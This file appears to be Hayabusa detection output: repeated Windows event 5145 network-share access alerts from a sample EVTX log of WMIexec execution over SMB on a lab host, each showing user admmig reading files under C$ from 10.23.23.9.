10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b#\4844f53bd0e47d8f8a5795e6484a0f88 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P0e11b656#\a169d08938fb7766d16496db1e648137 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f9a5e83#\75b419c806fb708ac368c6282c922a84 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# : IP Address: 
